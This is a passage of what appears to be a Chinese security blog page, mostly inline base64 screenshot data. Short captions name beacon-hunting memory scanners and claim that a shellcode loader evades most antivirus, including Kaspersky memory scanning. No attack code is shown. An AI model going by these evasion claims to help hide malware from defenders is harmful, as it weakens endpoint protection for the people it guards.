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
</p>
<p>BeaconEye/EvilEye</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>Hunt-Sleeping-Beacons</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>Hollows_Hunter</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>配合shellcode loader对抗大部分杀软了</p>
<p>卡巴内存扫描</p>
<p><img loading=lazy src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB94AAATSCAIAAAB3s9gLAAAgAElEQVR4nOydfXwU1b3/v7ObJxKR8GDkQXwABBVqWW7QanttLaIhiqgFH27pQ7BgbWmq12rrrcVK8aJQW8v11l5sk9bSW6rWh6KYitTe9tdaJbJoUSQGUBGCiBBAnpLszO+Pszt79jztzOxsNoHP++ULN2fOnPM9DzOz8znf/R6LOKqrq5ubmwkAUAjOPPPMDRs2CIm4Ko8OMLjHAspRvvTSS//5z38WxB6QPyoqKuSxBgAAAAAAAAAAfGFZjfuJnORfjpP+l/jP5Kbwf/dEXIMtK5TydKU4Tk/viTzCtz33fnYcIrJ8diff/1YONoQ2jrpycu4fK3khhmMn66uQZ6+H0sK5Gv2jm1e6HnAKZKhlR3QHfJXj2N3dAFaf4zjuZeg4TnJKhHETjiQHSjNeIc3kfNzPzY1n7eKHS7ineTQp4tnwvLQx/d3BU+Gesnm5n/CTzYiyf+SzzA+RELvOSl4ZluM4rFj2bzcZoLvBsdrlbjHeP70/tXX25/tu5d5VDR3IH9Jm06RHTLdnrnHJwbW4ZIs/lKpX7I+I5/tAykx/8yTrCAoF6q47y1YU5DhO1CrydVvTTU/t/PHzfHccJ0LG56mdYapgj5c5zx+V55V8jWue+oZx1NhvJ8uXTtTV4Ins0ynh7/uJuSLvdwNdP2etxbIsfg77fWxFEuI4uod8vYbI9bKUXEaLf5qQE2H2CBeszkiLy2O2M5WeUJYsz0D+/UUwybIs27a5MsUekPtZdzvSIeRP/2mL9rB/XXvcL7RCujt/hHQBg+XyDHQcJxKJkOq7StSK8Nncolh+X20nVXeZ88gXCH8F8WMtXwXKN033z6h0Db